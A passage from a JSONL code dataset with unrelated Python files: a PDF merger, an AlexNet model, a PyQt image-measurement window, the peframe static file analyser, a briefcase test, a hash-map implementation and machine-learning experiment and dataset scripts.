'emotion_form': emotion_form,\n 'detail': detail,\n }\n return render(request, 'emotion.html', retresult)\n emotion_form = EmotionForm()\n return render(request, 'emotion.html', {'emotion_form': emotion_form})\n","sub_path":"login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"239770304","text":"import PyPDF2\r\n\r\n# Using PyPDF2 for page-level editing of PDF files\r\n# Note that the PyPDF2 module cannot write text to a pdf\r\n\r\n\r\n# Using python's built-in open() method to read binary pdf files\r\npdf1File = open('meetingminutes1.pdf', 'rb')\r\npdf2File = open('meetingminutes2.pdf', 'rb')\r\n\r\n# Parse binary to reader object using PyPDF2 module\r\nreader1 = PyPDF2.PdfFileReader(pdf1File)\r\nreader2 = PyPDF2.PdfFileReader(pdf2File)\r\n\r\n# Creating a writer object (a pdf file, still not stored on disk)\r\nwriter = PyPDF2.PdfFileWriter()\r\n\r\n# Run through first pdf file, page by page, and add each page to the writer object\r\nfor pageNum in range(reader1.numPages):\r\n page = reader1.getPage(pageNum)\r\n writer.addPage(page)\r\n\r\nfor pageNum in range(reader2.numPages):\r\n page = reader2.getPage(pageNum)\r\n writer.addPage(page)\r\n\r\n# Save writer object to disk (PDF file)\r\noutputFile = open('combinedminutes.pdf', 'wb')\r\nwriter.write(outputFile)\r\n\r\noutputFile.close()\r\npdf1File.close()\r\npdf2File.close()\r\n","sub_path":"examples/editPDF_PyPDF2_example.py","file_name":"editPDF_PyPDF2_example.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"346401173","text":"\"\"\"\nIFT780 session project\nDate:\nAuthors: Alexandre Turpin, Quentin Levieux and Adrien Verdier\nLicense: Opensource, free to use\nOther: This file implements the AlexNet model\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom src.models.CNNBlocks import ConvBlock\n\n\nclass AlexNet(nn.Module):\n \"\"\"\n Class used to implement the AlexNet model\n \"\"\"\n\n def __init__(self, in_channels, num_classes):\n \"\"\"\n Args:\n in_channels: The input channel for this model\n num_classes: The number of classes\n \"\"\"\n super(AlexNet, self).__init__()\n\n self.conv1 = nn.Sequential(\n ConvBlock(in_channels, 96, kernel_size=11, stride=4, padding=0),\n nn.MaxPool2d(kernel_size=3, stride=2)\n )\n\n self.conv2 = nn.Sequential(\n ConvBlock(96, 256, kernel_size=5, stride=1, padding=2),\n nn.MaxPool2d(kernel_size=3, stride=2),\n )\n\n self.conv3 = ConvBlock(256, 384, kernel_size=3, stride=1, padding=1)\n\n self.conv4 = ConvBlock(384, 384, kernel_size=3, stride=1, padding=1)\n\n self.conv5 = nn.Sequential(\n ConvBlock(384, 256, kernel_size=3, stride=1, padding=1),\n nn.MaxPool2d(kernel_size=3, stride=2),\n )\n\n self.linear_layers = nn.Sequential(\n nn.Linear(256 * 6 * 6, 4096),\n nn.Dropout(p=0.5),\n nn.Linear(4096, 4096),\n nn.Dropout(p=0.5),\n nn.Linear(4096, num_classes),\n )\n\n def forward(self, x):\n \"\"\"\n This method implements the forward propagation of our model\n Args:\n x: The input of the model\n\n Returns:\n out: The output of the model\n \"\"\"\n out = self.conv1(x)\n out = self.conv2(out)\n out = self.conv3(out)\n out = self.conv4(out)\n out = self.conv5(out)\n\n out = out.view(out.size(0), -1)\n\n out = self.linear_layers(out)\n\n out = F.log_softmax(out, dim=1)\n\n return 
out\n","sub_path":"src/models/AlexNet.py","file_name":"AlexNet.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330290642","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 10 09:44:07 2019\nWindow for Measurement\n@author: juliengautier\n\"\"\"\n\n\nimport qdarkstyle \nfrom pyqtgraph.Qt import QtCore,QtGui \nfrom PyQt5.QtWidgets import QApplication,QVBoxLayout,QHBoxLayout,QPushButton\nfrom PyQt5.QtWidgets import QMenu,QWidget,QTableWidget,QTableWidgetItem,QAbstractItemView\nimport sys,time,os\nimport numpy as np\nimport pylab\nfrom PyQt5.QtGui import QIcon\nfrom scipy import ndimage\nfrom visu.WinCut import GRAPHCUT\nimport pathlib\n\n\nclass MEAS(QWidget):\n \n def __init__(self):\n \n super(MEAS, self).__init__()\n p = pathlib.Path(__file__)\n conf=QtCore.QSettings(str(p.parent / 'confVisu.ini'), QtCore.QSettings.IniFormat)\n \n self.icon=str(p.parent) + '/icons/'\n self.isWinOpen=False\n self.setup()\n self.setWindowTitle('MEASUREMENTS')\n self.shoot=0\n self.nomFichier=''\n self.TableSauv=['file,Max,Min,x Max,y max,Sum,Mean,Size,x c.mass,y c.mass']\n self.conf =conf\n self.path=self.conf.value('VISU'+\"/path\")\n self.winCoupeMax=GRAPHCUT()\n self.winCoupeMin=GRAPHCUT()\n self.winCoupeXmax=GRAPHCUT()\n self.winCoupeYmax=GRAPHCUT()\n self.winCoupeSum=GRAPHCUT()\n self.winCoupeMean=GRAPHCUT()\n self.winCoupeXcmass=GRAPHCUT()\n self.winCoupeYcmass=GRAPHCUT()\n self.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n self.Maxx=[]\n self.Minn=[]\n self.Summ=[]\n self.Mean=[]\n self.Xmax=[]\n self.Ymax=[]\n self.Xcmass=[]\n self.Ycmass=[]\n self.labelsVert=[]\n self.setWindowIcon(QIcon(self.icon+'LOA.png'))\n \n def setFile(self,file) :\n self.nomFichier=file\n \n def setup(self):\n \n vLayout=QVBoxLayout()\n \n hLayout1=QHBoxLayout()\n \n self.FileMenu=QPushButton('File')\n self.FileMenu2=QPushButton('Plot')\n hLayout1.addWidget(self.FileMenu)\n hLayout1.addWidget(self.FileMenu2)\n menu=QMenu()\n menu.addAction('&Open',self.openF)\n menu.addAction('&Save',self.saveF)\n self.FileMenu.setMenu(menu)\n menu2=QMenu()\n menu2.addAction('max',self.PlotMAX)\n menu2.addAction('min',self.PlotMIN)\n menu2.addAction('x max',self.PlotXMAX)\n menu2.addAction('y max',self.PlotYMAX)\n menu2.addAction('Sum',self.PlotSUM)\n menu2.addAction('Mean',self.PlotMEAN)\n \n menu2.addAction('x center mass',self.PlotXCMASS)\n menu2.addAction('y center mass',self.PlotYCMASS)\n \n self.FileMenu2.setMenu(menu2)\n \n \n \n hLayout2=QHBoxLayout()\n self.table=QTableWidget()\n hLayout2.addWidget(self.table)\n \n self.table.setColumnCount(10)\n #self.table.setRowCount(10)\n \n self.table.setHorizontalHeaderLabels(('File','Max','Min','x max','y max','Sum','Mean','Size','x c.mass','y c.mass'))\n self.table.horizontalHeader().setVisible(True)\n self.table.setAlternatingRowColors(True)\n self.table.resizeColumnsToContents()\n self.table.setEditTriggers(QAbstractItemView.NoEditTriggers)# no modifiable\n \n vLayout.addLayout(hLayout1)\n vLayout.addLayout(hLayout2)\n self.setLayout(vLayout)\n \n def saveF(self):\n \n fname=QtGui.QFileDialog.getSaveFileName(self,\"Save Measurements as txt file\",self.path)\n \n self.path=os.path.dirname(str(fname[0]))\n #mat=np.array(self.TableSauv)\n #print('mat=',mat)\n# with open('myfile','w',)as f:\n# json.dump(self.TableSauv,f)\n f=open(str(fname[0])+'.txt','w')\n f.write(\"\\n\".join(self.TableSauv))\n f.close()\n \n def openF(self) :\n print ('open not 
done')\n \n\n def PlotMAX(self):\n self.open_widget(self.winCoupeMax)\n self.winCoupeMax.SetTITLE('Plot Max')\n self.winCoupeMax.PLOT(self.Maxx)\n \n def PlotMIN(self):\n self.open_widget(self.winCoupeMin)\n self.winCoupeMin.SetTITLE('Plot Min')\n self.winCoupeMin.PLOT(self.Minn)\n \n \n def PlotXMAX(self):\n self.open_widget(self.winCoupeXmax)\n self.winCoupeXmax.SetTITLE('Plot X MAX')\n self.winCoupeXmax.PLOT(self.Xmax)\n \n def PlotYMAX(self):\n self.open_widget(self.winCoupeYmax)\n self.winCoupeYmax.SetTITLE('Plot Y MAX')\n self.winCoupeYmax.PLOT(self.Ymax)\n \n \n def PlotSUM(self):\n self.open_widget(self.winCoupeSum)\n self.winCoupeSum.SetTITLE('Plot Sum')\n self.winCoupeSum.PLOT(self.Summ)\n \n def PlotMEAN(self):\n self.open_widget(self.winCoupeMean)\n self.winCoupeMean.SetTITLE('Plot Mean')\n self.winCoupeMean.PLOT(self.Mean)\n \n def PlotXCMASS(self):\n self.open_widget(self.winCoupeXcmass)\n self.winCoupeXcmass.SetTITLE('Plot x center of mass')\n self.winCoupeXcmass.PLOT(self.Xcmass)\n \n def PlotYCMASS(self):\n self.open_widget(self.winCoupeYcmass)\n self.winCoupeYcmass.SetTITLE('Plot Y center of mass')\n self.winCoupeYcmass.PLOT(self.Ycmass) \n \n \n def Display(self,data):\n \n maxx=round(data.max(),3)\n minn=round(data.min(),3)\n summ=round(data.sum(),3)\n moy=round(data.mean(),3)\n \n (xmax,ymax)=pylab.unravel_index(data.argmax(),data.shape)\n (xcmass,ycmass)=ndimage.center_of_mass(data)\n xcmass=round(xcmass,3)\n ycmass=round(ycmass,3)\n xs=data.shape[0]\n ys=data.shape[1]\n self.table.setRowCount(self.shoot+1)\n self.table.setItem(self.shoot, 0, QTableWidgetItem(str(self.nomFichier)))\n self.table.setItem(self.shoot, 1, QTableWidgetItem(str(maxx)))\n self.table.setItem(self.shoot, 2, QTableWidgetItem(str(minn)))\n self.table.setItem(self.shoot, 3, QTableWidgetItem(str(xmax)))\n self.table.setItem(self.shoot, 4, QTableWidgetItem(str(ymax)))\n self.table.setItem(self.shoot, 5, QTableWidgetItem(str(summ)))\n self.table.setItem(self.shoot, 6, QTableWidgetItem(str(moy)))\n self.table.setItem(self.shoot, 7, QTableWidgetItem( (str(xs) +'*'+ str(ys) ) ))\n self.table.setItem(self.shoot, 8, QTableWidgetItem( str(xcmass) ) )\n self.table.setItem(self.shoot, 9, QTableWidgetItem( str(ycmass) ) )\n \n self.table.resizeColumnsToContents()\n self.labelsVert.append('%s'% self.shoot)\n self.TableSauv.append( '%s,%.1f,%.1f,%i,%i,%.1f,%.3f,%i*%i,%.2f,%.2f' % (self.nomFichier,maxx,minn,xmax,ymax,summ,moy,xs,ys,xcmass,ycmass) )\n self.Maxx.append(maxx)\n self.Minn.append(minn)\n self.Summ.append(summ)\n self.Mean.append(moy)\n self.Xmax.append(xmax)\n self.Ymax.append(ymax)\n \n self.Xcmass.append(xcmass)\n self.Ycmass.append(ycmass)\n \n \n self.table.setVerticalHeaderLabels(self.labelsVert)\n\n\n\n # plot Update \n if self.winCoupeMax.isWinOpen==True:\n self.winCoupeMax.PLOT(self.Maxx)\n if self.winCoupeMin.isWinOpen==True:\n self.winCoupeMin.PLOT(self.Minn)\n \n if self.winCoupeXmax.isWinOpen==True:\n self.winCoupeXmax.PLOT(self.Xmax)\n if self.winCoupeYmax.isWinOpen==True:\n self.winCoupeYmax.PLOT(self.Ymax) \n if self.winCoupeSum.isWinOpen==True:\n self.winCoupeSum.PLOT(self.Summ)\n \n if self.winCoupeMean.isWinOpen==True:\n self.winCoupeMean.PLOT(self.Mean)\n \n if self.winCoupeXcmass.isWinOpen==True:\n self.winCoupeXcmass.PLOT(self.Xcmass)\n if self.winCoupeYcmass.isWinOpen==True:\n self.winCoupeYcmass.PLOT(self.Ycmass)\n \n self.shoot+=1\n \n def closeEvent(self, event):\n \"\"\"Called when the window is closed.\n \"\"\"\n 
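# Reset the per-session state and close every child plot window so no GRAPHCUT widgets outlive the measurement window.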
self.isWinOpen=False\n self.shoot=0\n self.TableSauv=['file,Max,Min,x Max,y max,Sum,Mean,Size,x c.mass,y c.mass']\n \n if self.winCoupeMax.isWinOpen==True:\n self.winCoupeMax.close()\n if self.winCoupeMin.isWinOpen==True:\n self.winCoupeMin.close()\n if self.winCoupeXmax.isWinOpen==True:\n self.winCoupeXmax.close()\n if self.winCoupeYmax.isWinOpen==True:\n self.winCoupeYmax.close()\n if self.winCoupeSum.isWinOpen==True:\n self.winCoupeSum.close()\n if self.winCoupeMean.isWinOpen==True:\n self.winCoupeMean.close() \n if self.winCoupeXcmass.isWinOpen==True:\n self.winCoupeXcmass.close()\n if self.winCoupeYcmass.isWinOpen==True:\n self.winCoupeYcmass.close()\n time.sleep(0.1)\n event.accept() \n\n def open_widget(self,fene):\n \"\"\"Open a supplementary widget window.\n \"\"\"\n\n if fene.isWinOpen==False:\n fene.isWinOpen=True\n A=self.geometry()\n fene.setGeometry(A.left()+A.width(),A.top(),500,A.height())\n fene.show()\n else:\n fene.activateWindow()\n fene.raise_()\n fene.showNormal()\n \n \n \nif __name__ == \"__main__\":\n appli = QApplication(sys.argv) \n appli.setStyleSheet(qdarkstyle.load_stylesheet_pyqt5())\n e = MEAS() \n e.show()\n appli.exec_() ","sub_path":"visu/winMeas.py","file_name":"winMeas.py","file_ext":"py","file_size_in_byte":9535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"366729713","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# by Gianni 'guelfoweb' Amato\n\nimport os\nimport re\nimport sys\nimport json\nimport magic\nimport pefile\nimport hashlib\nimport pandas as pd\nfrom datetime import datetime\n\nportable = False\nfor path in sys.path:\n if os.sep + 'peframe' + os.sep + 'peframe' in path:\n portable = True\nif portable:\n from modules import directories\n from modules import features\n from modules import apialert\n from modules import yara_check\n from modules import meta\n from modules import virustotal\n from modules import sections\n from modules import fileurl\n from modules import macro\n from modules import headers\n from modules import nucleus\nelse:\n from peframe.modules import directories\n from peframe.modules import features\n from peframe.modules import apialert\n from peframe.modules import yara_check\n from peframe.modules import meta\n from peframe.modules import virustotal\n from peframe.modules import sections\n from peframe.modules import fileurl\n from peframe.modules import macro\n from peframe.modules import headers\n from peframe.modules import nucleus\n\n\ndef version():\n return \"6.0.3\"\n\n\ndef get_datetime_now():\n return datetime.now()\n\n\ndef isfile(filename):\n if os.path.isfile(filename):\n return True\n return False\n\n\ndef ispe(filename):\n if re.match(r'^PE[0-9]{2}|^MS-DOS', filetype(filename)):\n return True\n return False\n\n\ndef filetype(filename):\n return magic.from_file(filename)\n\n\ndef filesize(filename):\n return os.path.getsize(filename)\n\n\ndef get_imphash(filename):\n pe = pefile.PE(filename)\n return pe.get_imphash()\n\n\ndef gethash(filename):\n hashinfo = {}\n\n fh = open(filename, 'rb')\n m = hashlib.md5()\n s = hashlib.sha1()\n s256 = hashlib.sha256()\n\n while True:\n data = fh.read(8192)\n if not data:\n break\n\n m.update(data)\n s.update(data)\n s256.update(data)\n\n hashinfo.update({\"md5\": m.hexdigest(), \"sha1\": s.hexdigest(), \"sha256\": s256.hexdigest()})\n\n return hashinfo\n\n\ndef path_to_file(filename, folder):\n _ROOT = os.path.abspath(os.path.dirname(__file__))\n return os.path.join(_ROOT, folder, 
filename)\n\n\ndef load_config(config_file):\n with open(config_file) as conf:\n data = json.load(conf)\n return data\n\n\ndef files_to_edit():\n path = {\n \"api_config\": path_to_file('config-peframe.json', 'config'),\n \"string_match\": path_to_file('stringsmatch.json', 'signatures'),\n \"yara_plugins\": path_to_file('yara_plugins', 'signatures')\n }\n return path\n\n\ndef analyze(filename):\n if not isfile(filename):\n exit(\"File not found\")\n\n dt_start = get_datetime_now()\n\n fileinfo = {\n \"version\": version(),\n \"filename\": filename,\n \"filetype\": filetype(filename),\n \"filesize\": filesize(filename),\n # \"virustotal\": virustotal.get_result(\n # \tload_config(\n # \t\tpath_to_file('config-peframe.json', 'config'))['virustotal'],\n # \tgethash(filename)['md5']),\n }\n\n hashes = gethash(filename)\n fileinfo.update({\n \"md5\": hashes[\"md5\"],\n \"sha1\": hashes[\"sha1\"],\n \"sha256\": hashes[\"sha256\"]\n })\n\n # peinfo = {}\n # docinfo = {}\n #\n # fileinfo.update({\"docinfo\": docinfo})\n # fileinfo.update({\"peinfo\": peinfo})\n\n function_size_list = nucleus.analysis(filename)\n\n if ispe(filename):\n pe = pefile.PE(filename)\n fileinfo.update({\n \"imphash\": pe.get_imphash(),\n \"timestamp\": datetime.utcfromtimestamp(pe.FILE_HEADER.TimeDateStamp).strftime('%Y-%m-%d %H:%M:%S'),\n \"dll\": pe.FILE_HEADER.IMAGE_FILE_DLL,\n \"imagebase\": pe.OPTIONAL_HEADER.ImageBase,\n \"entrypoint\": pe.OPTIONAL_HEADER.AddressOfEntryPoint,\n \"behavior\": yara_check.yara_match_from_file(\n path_to_file('antidebug_antivm.yar', 'signatures/yara_plugins/pe'), filename),\n \"breakpoint\": apialert.get_result(pe, load_config(path_to_file('stringsmatch.json', 'signatures'))[\n 'breakpoint']),\n \"metadata\": meta.get(pe),\n \"function_size\": function_size_list\n })\n\n fileinfo.update(headers.get_dos_header(pe))\n fileinfo.update(headers.get_file_header(pe))\n fileinfo.update(headers.get_optional_header(pe))\n fileinfo.update(features.get_result(pe, filename))\n\n sections_dict = sections.get_result(pe)\n fileinfo.update({\"section_count\": sections_dict[\"count\"], \"section_details\": sections_dict[\"details\"]})\n\n strings_dict = fileurl.get_result(filename, load_config(path_to_file('stringsmatch.json', 'signatures')))\n fileinfo.update({\n \"string_file\": strings_dict[\"file\"],\n \"string_url\": strings_dict[\"url\"],\n \"string_ip\": strings_dict[\"ip\"],\n \"string_fuzzing\": strings_dict[\"fuzzing\"],\n \"string_dump\": strings_dict[\"dump\"],\n \"string_count\": strings_dict[\"string_count\"],\n })\n\n directories_dict = directories.get(pe)\n export_df = pd.DataFrame(directories_dict[\"export\"])\n if not export_df.empty:\n export_df[\"function\"] = export_df[\"function\"].apply(lambda x: x.decode(\"utf-8\") if not isinstance(x,str) else x)\n\n fileinfo.update({\n \"import\": directories_dict[\"import\"],\n \"export\": export_df.to_dict('records'),\n \"debug\": directories_dict[\"debug\"],\n \"tls\": directories_dict[\"tls\"],\n \"resources\": directories_dict[\"resources\"],\n \"relocations\": directories_dict[\"relocations\"],\n \"sign\": directories_dict[\"sign\"]\n })\n\n fileinfo.update({\"yara_plugins\": yara_check.yara_match_from_folder(\n path_to_file('pe', 'signatures/yara_plugins'), filename, ['antidebug_antivm.yar'])})\n else:\n fileinfo.update({\"docinfo\": macro.get_result(filename)})\n fileinfo.update({\"yara_plugins\": yara_check.yara_match_from_folder(\n path_to_file('doc', 'signatures/yara_plugins'), filename)})\n\n dt_end = get_datetime_now()\n\n 
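# Attach the total wall-clock analysis time; 'e_res'/'e_res2' are reserved DOS-header fields, presumably dropped because they add nothing useful to the report.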
fileinfo.update({\"time\": str(dt_end - dt_start)})\n del fileinfo[\"e_res\"]\n del fileinfo[\"e_res2\"]\n return fileinfo\n","sub_path":"peframe/peframe.py","file_name":"peframe.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"547804659","text":"import sys\nimport time\nimport numpy as np\nimport scipy.stats\n#import plackettluce as pl\nimport stats as stats\nimport mmgbtl as mm\nimport csv\nimport glob\nimport os\n\n\nif __name__ == '__main__':\n maxdatasize = 1000\n mm_iters = 100\n mm_epsilon = None\n trialcnt = 0\n rslt_rt_mm = np.zeros((maxdatasize, 10), float)\n rslt_bt_mm = np.zeros((maxdatasize, 10), float)\n rslt_ot_mm = np.zeros((maxdatasize, 10), float)\n for f in glob.glob(\"*.csv\"):\n trialcnt += 1\n print(\"Trial: \", trialcnt)\n filename = open(f)\n reader = csv.reader(filename)\n next(reader)\n gt = next(reader)\n gamma = [ float(x) for x in gt ]\n m = len(gamma)\n gamma = np.asarray(gamma)\n data = []\n for itr in range(0, maxdatasize):\n data.append([ int(x) for x in next(reader)])\n\n rslt_mse_mm = np.zeros((mm_iters, 10), float)\n\n rslt_mm_full = np.zeros((mm_iters, m * 10), float)\n\n print(\"n = \", end='')\n sys.stdout.flush()\n\n for j in range(0, 10):\n n = (j + 1) * 100\n\n alts = [i for i in range(m)]\n mmagg = mm.MMPLAggregator(alts)\n\n print(\"\\b\"*len(str(j*100)) + str((j+1)*100), end='')\n sys.stdout.flush()\n votes = np.asarray(data[0:n])\n t_mm = time.perf_counter()\n gamma_mmfull, btime, otime = mmagg.aggregate(votes, mm_epsilon, mm_iters)\n t_mm = time.perf_counter() - t_mm\n rslt_mm_full[:, j*100:(j+1)*100 ] = gamma_mmfull\n gamma_mm = gamma_mmfull[-1]\n rslt_rt_mm[trialcnt-1,j] = t_mm\n rslt_bt_mm[trialcnt-1,j] = btime\n rslt_ot_mm[trialcnt-1,j] = otime\n for itr in range(0, mm_iters):\n rslt_mse_mm[itr, j] = stats.mse(gamma, gamma_mmfull[itr])\n\n print()\n outnameMM_mse = \"rslt_mm_mse_\"+str(trialcnt)+\".csv\"\n outnameMMfull = \"rslt_mm_est_\"+str(trialcnt)+\".csv\"\n np.savetxt(outnameMM_mse, rslt_mse_mm, delimiter=',', newline=\"\\r\\n\")\n np.savetxt(outnameMMfull, rslt_mm_full, delimiter=',', newline=\"\\r\\n\")\n np.savetxt(\"mm_rt.csv\", rslt_rt_mm, delimiter=',', newline=\"\\r\\n\")\n np.savetxt(\"mm_bt.csv\", rslt_bt_mm, delimiter=',', newline=\"\\r\\n\")\n np.savetxt(\"mm_ot.csv\", rslt_ot_mm, delimiter=',', newline=\"\\r\\n\")\n #break\n","sub_path":"Zhibing/mm100iter.py","file_name":"mm100iter.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"536294811","text":"import zipfile\nfrom unittest import mock\n\nfrom briefcase.platforms.macOS.app import macOSAppCreateCommand\n\n\ndef test_install_app_support_package(first_app_config, tmp_path):\n \"\"\"A support package can be downloaded and unpacked where it is needed.\"\"\"\n # Write a temporary support zip file which includes the Python lib\n support_file = tmp_path / \"out.zip\"\n with zipfile.ZipFile(support_file, \"w\") as support_zip:\n support_zip.writestr(\"internal/file.txt\", data=\"hello world\")\n support_zip.writestr(\"Python/Resources/lib/module.py\", data=\"code\")\n\n # create app paths\n app_path = tmp_path / \"macOS\" / \"app\" / \"First App\" / \"First App.app\"\n lib_path = app_path / \"Contents\" / \"Resources\"\n support_path = lib_path / \"Python\" / \"Support\"\n support_path.mkdir(parents=True)\n\n create_command = macOSAppCreateCommand(base_path=tmp_path)\n\n # Modify 
download_url to return the temp zipfile\n create_command.download_url = mock.MagicMock(return_value=support_file)\n\n # Mock support package path\n create_command.support_path = mock.MagicMock(return_value=support_path)\n\n # Install the support package\n create_command.install_app_support_package(first_app_config)\n\n # Confirm that only the lib was kept\n assert (support_path / \"Python\" / \"Resources\" / \"lib\").exists()\n assert (support_path / \"Python\" / \"Resources\" / \"lib\" / \"module.py\").exists()\n assert not (support_path / \"internal\").exists()\n","sub_path":"tests/platforms/macOS/app/test_create.py","file_name":"test_create.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"474207325","text":"from Double_Linked_Lists import Double_Linked_List\nfrom DataNode import DataNode\n\nLINEAR_PROBING = 0\nQUADRATIC_PROBING = 1\nSEPERATE_CHAINING = 2\n\nclass HashMap:\n def __init__(self, length, collisiontype, hashfunction):\n self.lijst = None\n #If the params are valid, create the main variables\n if self.createHashMap(length, collisiontype):\n self.length = length\n self.collisionType = collisiontype\n self.hashfunction = hashfunction\n\n def createHashMap(self, length, collisiontype):\n \"\"\"\n Create a new hashmap.\n :param length: The length of the table.\n :param collisiontype: The way to solve a collision.\n :return: True if the creation was successful, false otherwise.\n \"\"\"\n #Input validation\n if collisiontype < 0 or collisiontype > 2:\n print(\"Invalid collisiontype!!\")\n return False\n\n if length <= 0:\n print(\"Invalid length!\")\n return False\n\n #Creating map\n self.lijst = []\n for i in range(length):\n self.lijst.append(\"\")\n #If linked lists are used, fill every position with an empty link\n if collisiontype == 2:\n for i in range(length):\n new_link = Double_Linked_List()\n self.lijst[i] = new_link\n return True\n\n def isEmpty(self):\n \"\"\"\n Checks if the table is empty.\n :return: True if the table is empty, false otherwise\n \"\"\"\n for item in self.lijst:\n if self.collisionType == 2:\n if not item.isEmpty():\n return False\n elif item != \"\":\n return False\n return True\n\n def tableInsert(self, searchKey, data):\n \"\"\"\n Inserts a new element in the table.\n :param searchKey: The new item to insert\n :param data: The data that needs to be stored\n :return: True if the insertion succeeded, false otherwise.\n \"\"\"\n #Calculate adres and make datanode\n adres = self.calculateAdres(searchKey)\n new_node = DataNode(searchKey, data)\n #Check if a collision occurs\n if self.lijst[adres] != \"\":\n return self.solveCollision(adres, new_node, False)\n else:\n if self.collisionType == 2:\n self.lijst[adres].insertBeginning(new_node)\n else:\n self.lijst[adres] = new_node\n return True\n\n def calculateAdres(self, searchKey):\n \"\"\"\n Calculates the adres with the hashfunction.\n :param searchKey: The key to be used in the function\n :return: The adres calculated by the hash function.\n \"\"\"\n adres = 0\n if type(searchKey) is str:\n adres = len(searchKey) % self.length\n elif type(searchKey) is int:\n adres = searchKey % self.length\n return adres\n\n def tableRetrieve(self, searchKey):\n \"\"\"\n Returns an item from the hashmap.\n :param searchKey: The key to search for.\n :return: The node stored under searchKey, or False if nothing was found.\n \"\"\"\n if self.isEmpty():\n return False\n 
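# Hash the key, then reuse the collision-resolution routine in search mode to locate the matching node.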
adres = self.calculateAdres(searchKey)\n if self.collisionType == 2:\n return self.solveCollision(adres, searchKey, True)\n position = self.solveCollision(adres, searchKey, True)\n node = self.lijst[position]\n return node\n\n def tableDelete(self, searchKey):\n \"\"\"\n Deletes an item from the hashmap.\n :param searchKey: Key from the node that needs to be deleted.\n :return: True if the deletion succeeded, false otherwise.\n \"\"\"\n if self.isEmpty():\n return False\n adres = self.calculateAdres(searchKey)\n if self.collisionType == 2:\n deleted = self.seperateChaining(adres, searchKey, True, True)\n if deleted:\n return deleted\n else:\n return True\n else:\n position = self.solveCollision(adres, searchKey, True)\n if not position:\n return position\n else:\n self.lijst[position] = \"\"\n return True\n\n def solveCollision(self, adres, data, search):\n \"\"\"\n Solves a collision by choosing from one of the methods.\n :param adres: Adres that caused collision\n :param data: The item to be inserted.\n :param search: Indicates if the algorithm has to search or not.\n :return: success, adres: Indicates whether the collision was solved. True if it was,\n false if it couldn't solve the collision.\n \"\"\"\n if self.collisionType == 0:\n return self.linearProbing(adres, data, search)\n elif self.collisionType == 1:\n return self.quadraticProbing(adres, data, search)\n elif self.collisionType == 2:\n return self.seperateChaining(adres, data, search, False)\n\n def linearProbing(self, adres, data, search):\n \"\"\"\n Solve a collision with linear probing.\n :param adres: Adres that caused collision.\n :param data: The item to be inserted.\n :param search: Indicates if the algorithm has to search or not.\n :return: Indicates whether the collision was solved. True if it was,\n false if it couldn't solve the collision.\n \"\"\"\n current_adres = adres\n count = 0\n while True:\n #Search through the list for the searchkey\n if search:\n if self.lijst[current_adres] != \"\":\n if self.lijst[current_adres].searchKey == data:\n return current_adres\n #Insert element\n else:\n if self.lijst[current_adres] == \"\":\n self.lijst[current_adres] = data\n return True\n\n current_adres += 1\n count += 1\n\n if count == self.length:\n return False\n\n #Make sure to keep looping over the list\n if current_adres == self.length:\n current_adres = 0\n\n def quadraticProbing(self, adres, data, search):\n \"\"\"\n Solve a collision with quadratic probing.\n :param adres: Adres that caused collision.\n :param data: The item to be inserted.\n :param search: Indicates if the algorithm has to search or not.\n :return: Indicates whether the collision was solved. 
True if it was,\n false if it couldn't solve the collision.\n \"\"\"\n current_adres = adres\n #i starts at 1: the first recomputed probe below is adres + 1**2\n i = 1\n #Starts on 1 because we already visited the initial adres\n count = 1\n while True:\n #Search through the list for the searchkey\n if search:\n if self.lijst[current_adres] != \"\":\n if self.lijst[current_adres].searchKey == data:\n return current_adres\n else:\n if self.lijst[current_adres] == \"\":\n self.lijst[current_adres] = data\n return True\n\n current_adres = (adres + i**2)%self.length\n i += 1\n count += 1\n\n #Check if the whole list was checked\n if count == self.length:\n return False\n\n # if current_adres >= self.length:\n # current_adres = 0\n\n def seperateChaining(self, adres, data, search, delete):\n \"\"\"\n Solve a collision with separate chaining.\n :param adres: Adres that caused collision.\n :param data: The item to be inserted.\n :param search: Indicates if the algorithm has to search or not.\n :param delete: Indicates if the algorithm has to delete or not.\n :return: Indicates whether the collision was solved or the item found. True if it was,\n false if it couldn't solve the collision.\n \"\"\"\n if search:\n table = self.lijst[adres]\n length = table.getLength()\n current_link = table.head\n counter = 0\n while counter != length:\n if current_link.item.searchKey == data:\n if delete:\n table.delete(counter)\n return True\n else:\n return current_link.item\n else:\n current_link = current_link.next\n counter += 1\n return False\n else:\n self.lijst[adres].insertBeginning(data)\n return True\n","sub_path":"thomas/HashMap.py","file_name":"HashMap.py","file_ext":"py","file_size_in_byte":8727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"513550039","text":"from torch.utils.data import Dataset\r\nfrom tqdm import tqdm\r\nfrom PIL import Image\r\nimport json\r\nimport time\r\nimport os\r\nimport imageio\r\nimport torch\r\nimport numpy as np\r\n\r\nclass Landmark(Dataset):\r\n def __init__(self, images, labels, transform=None):\r\n assert len(images) == len(labels), \"Number of images != Number of labels\"\r\n self.images = images\r\n self.labels = labels\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n return len(self.images)\r\n\r\n def __getitem__(self, item):\r\n # im = imageio.imread(self.images[item])\r\n im = Image.open(self.images[item])\r\n lbl = self.labels[item]\r\n tmp = im.getpixel((0, 0))\r\n if isinstance(tmp, int) or len(tmp) != 3:\r\n im = im.convert(\"RGB\")\r\n if self.transform is not None:\r\n im = self.transform(im)\r\n\r\n return im, lbl\r\n\r\n def 